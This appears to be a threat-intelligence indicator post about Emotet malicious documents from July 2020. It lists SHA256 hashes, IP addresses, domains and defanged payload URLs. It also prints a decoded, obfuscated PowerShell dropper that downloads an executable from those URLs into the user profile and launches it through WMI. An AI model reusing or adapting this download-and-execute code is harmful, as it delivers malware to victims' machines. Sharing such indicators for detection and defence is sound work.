Emotet_Doc_out_2020-07-28_11_57.txt

1. #Emotet #Docs #malware #OSINT #IOC
2.  
3. SHA256:
4.  
5. ed41a46cc4cfbbc76641153afe9c02cc26886654483c01450293825d5f64904b
6.  
7. 7da491ebf960db553ac5406c952edb7e3f5edbf1c8a0cbac65e1ec1a7a0ee766
8. 6e86292d81a588b8fe865c672d1d7a08e7466ece264415b74b100564e1b811e7
9. 670d9f0b35181bf02a22246f4695c2bc2e4e056c636e3381916dc6fc35a2eaf8
10. 1a22bc2d5ab7c96cd82e4506e49efae17bacd6124bba8f1ea167c8f6c18213bd
11. 3150dba7885b3ffb68c46ff0998b7bbdf3fd3a08a2b1d1e3e8a9247f68f3073d
12. 3394a8b91ea5b64a2595631b5c8a61a4dc428aced065ad0bf2fbb208c71f2fa1
13. 6d0c01bf6407219c53a6c8d1d0e49c2dfb8e564ab8c8e8d43282b537184e2053
14. de6e7651ff04fb8cac8811308974a0c63e8eaf94b2822a2756b904e010037d8d
15. ae476dc84226859dea039560cb04e51ea1496660c3cf736699149189bf329ccf
16. 4f553775f64c4b293f15951bff22a4e270365d94f25f5da89a09c1c0c053ca78
17. 6c963e5f156a1997d05217dd2e95b78b3acc18dd0d021edef023bc2cf3da4f9f
18. 7e172876169c7cb47adcb22277921cab0052b058ad5e74be410af83a2124ce78
19. d5fcae8da6eb3ba0e7ec2cd8c0c7e483303cf86e330dba325033894e7b3dcb54
20. 1a6d1ba1fd2cc8f3f4b5fa40d134e14a9943a5a7388411e51265991344390afd
21. 023f4e503301706417dc3f41e97c80ea36b0b8cb13a6bc00033127f5f02cf3fb
22. 7e367005096c8b3f267835a07445ee2da42934f0c812f5f04450433cbb749431
23. c8ddfe93a33470e36d777cd8154d546ceac1f2b81b436b0b14c6d47cf8587db0
24. 02a8d27299fc6e7b5683da67992da160a28ee1a8d16a6b283b1283b4b117c4b6
25. 8f2eaf4202b4be0080f71fa8f59520f0fea9e9cd7665094a525da3b3f11503e6
26. 433d6bb838d6c2b28b8ef3a372f22d9c88cd35ab4ae071fd7d922554d8abbeae
27. ffcc77d43111d72c984db59cf32499affcf2cacef63bee20c75969a0e2b8eb59
28. c0358342559bf99321e5442110b9321021b2b6ff793c9c1a2ee1da9211fe738b
29. 09f7d48ed4d70c24ee8888b1ef67071cbca500ff3fe98267923a5ff68d113b28
30. 8eec7fabc0058e0bdd126d4940cc9eb119bc517668d81d4e5bb837dec39c36be
31. b0777df591af74e9a96ecc80891c896c182d02a61cddaa6a3a6a049df90cdf74
32. c1b384454be18ab1bcb25dc31ee1a9432283f35544667066f60d88f2b292c53c
33. 85c0054d03f6827fefa03852af4a9e70e6cdf01f74051e158525bf650780bac5
34. 0a479543609c0a5dfd9da512221616a307fb608be96c70898e17e94481ede16f
35. 91631b5f74221ef36cfacf1572e87d4a71c5876f16e20d1131401cf6f61f0c1e
36. a0b0b8438cd5623e25d5a019dc04e367c058ca0333276f52bdf503e676e681f3
37. e39269785585767c883341b5d3baebb1e7914575427027e4a1ab6e14982cc43f
38. 23dc1dca99e2fac527a912b49c9a9585d5425e4266e8898d5a909e07c403c8d8
39. 99fac314dd47a854ef8277c1789099edb56f00702532ca41dd2c761454ac40d1
40. b55ef1a5bf7039156fc966f9ee6029eb34adfed07eb41513323dcb531f423a9e
41. ac0c05258a76bf5ce28ac5288b36834125f716d074b84afc226730ff3e3e3632
42. 8f2d832bd2b25d37066fcf493ac609353ba41357d61c018bf6937e553e1701f8
43. 1617434d86067f8c03fc8acc0d383aff327510a0d3294d3607787075209f4a07
44. 0b6408990b52722868cdfa9d182b4c82c6e63cb90ba34e9ad7095dbc7389b264
45. af408c78c166c8cc2e8d5d4fae86a09948fc440b1479524e433c8d93238c4813
46. 1a419986c2ddfd69b1fdf043700422a2df985707d6e03a7efe42ed182d630c66
47. 3af0165cec5db6ff9ab6c18aa6ff4ee7752db47ea36c71ecab4e77c3da2d9935
48. 97ff7c2c097cd943607c5fcf76feea7d24b42b35cb8abf7e380d0e3a7ebb9d2d
49. 6c5d170321bd2c9bbf26d6d710485bc49663952dba2726292b8a2118390319ef
50. 3fc0f7ff03bd442295279da349138760a0f3181e16cef998332720f6c509c32a
51. cf253830c0484f6a93945b844e71d9d20ebe95c0a8e699fe12be87b07d04959e
52. 63c221bc21f1b5720997bfa2d9edd61ca8f64a771ae9334a474b1f9a82017468
53. 156df3a41550c999f475e13ac003b4a08360431dec19035610a316382ee375d9
54. 8c34501d79ad72ce3d667b0207ccf20a512041cf3ff5b8c5b0a5226e6c5f9e05
55. a89a0218a485d9fd640c38b6bef0bb9dfc80c74f6ee7b5a24bdb35b4a5b907c5
56. 78eed1b4f1cfa761cdb70a2f13074b370f5cb7ae6b90d864928b6c378795f4fa
57. ae3fe22384694c5fb3e90b4187e3766f58f0a7cacd0d60df5b5928b8cb380c69
58. b6b016bba549ff7463a4291ace22f371939592d915ba8b62415e1095b83c5369
59. acc24f2c82f75c03dcd793769b2370d4047ddc7d45a9a6259c45d0131601bd54
60. 69eb7da9a7f1ab07ac5516128f0320cf4d805b95c4ef121cba44a49a9e582be4
61. 3026d2a170c300a107ba8fc93c4a30219dbd9e888abafde4b08adf098416b010
62.  
63.  
64. IPs:
65. 107.190.129.106
66. 162.241.193.129
67. 173.255.128.163
68. 203.98.95.116
69. 66.198.240.56
70.  
71. Domains:
72.  
73. benmedia.com
74. sheilasteinfeld.com
75. strange.info
76. xsesa.com
77. zmgmedia.com
78.  
79.  
80. hxxp://zmgmedia.com/cgi-bin/zdJPC233/
81. hxxp://xsesa.com/cgi-bin/d8l5149/
82. hxxp://sheilasteinfeld.com/cgi-bin/rlD/
83. hxxp://benmedia.com/assets/2ib5/
84. hxxp://strange.info/cgi-bin/6EQ35998/
85.  
86.  
87. Decoded Base64 Powershell:
88. $yoadkoybuattuux='quitluutzeij';
89. [Net.ServicePointManager]::"SEC`UrITY`PRO`T`oCOL" = 'tls12, tls11, tls';
90. $diayruamgeoh = '368';
91. $cukpithnug='goodvuubweem';
92. $fioxvaunbeey=$env:userprofile+'\'+$diayruamgeoh+'.exe';
93. $memxeuj='haurmeokheer';
94. $hedbaphaub=.('ne'+'w'+'-objec'+'t') neT.WEBclIEnt;
95. $faelchoeh='hxxp://zmgmedia.com/cgi-bin/zdJPC233/
96. hxxp://xsesa.com/cgi-bin/d8l5149/
97. hxxp://sheilasteinfeld.com/cgi-bin/rlD/
98. hxxp://benmedia.com/assets/2ib5/
99. hxxp://strange.info/cgi-bin/6EQ35998/'."spL`it"([char]42);
100. $couhfeobloej='boimgokhauj';
101. foreach($woerzicvux in $faelchoeh){try{$hedbaphaub."D`OwnL`oaDfILe"($woerzicvux, $fioxvaunbeey);
102. $xiodbuuvzew='jaiquthoey';
103. If ((&('Ge'+'t-I'+'tem') $fioxvaunbeey)."LENG`Th" -ge 34717) {([wmiclass]'win32_Process')."c`REa`TE"($fioxvaunbeey);
104. $muandoacsub='xoektheoqu';
105. break;
106. $thaiztop='detfeekwog'}}catch{}}$zaohchaekbom='yonciz'
107.